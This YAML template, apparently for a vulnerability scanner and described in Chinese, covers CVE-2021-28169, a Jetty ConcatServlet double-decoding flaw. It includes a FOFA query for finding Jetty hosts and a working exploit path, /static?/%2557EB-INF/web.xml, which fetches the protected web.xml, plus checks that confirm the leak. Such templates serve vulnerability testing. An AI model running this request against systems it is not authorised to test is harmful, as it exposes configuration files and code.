product: Jetty
vName: Jetty 通用 Servlets 组件 ConcatServlet 信息泄露
type: 信息泄露
vID:
  - CVE-2021-28169
level: 3
vDesc: 在9.4.40, 10.0.2, 11.0.2版本前，Jetty Servlets中的ConcatServlet、WelcomeFilter类存在多重解码问题，如果开发者主动使用了这两个类，攻击者可以利用其访问WEB-INF目录下的敏感文件，造成配置文件及代码泄露。
version: ''
note: ''
search:
  FOFA: app="Jetty"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/中间件漏洞/Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞 CVE-2021-28169.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /static?/%2557EB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - web-app
              - <display-name>
            logic: and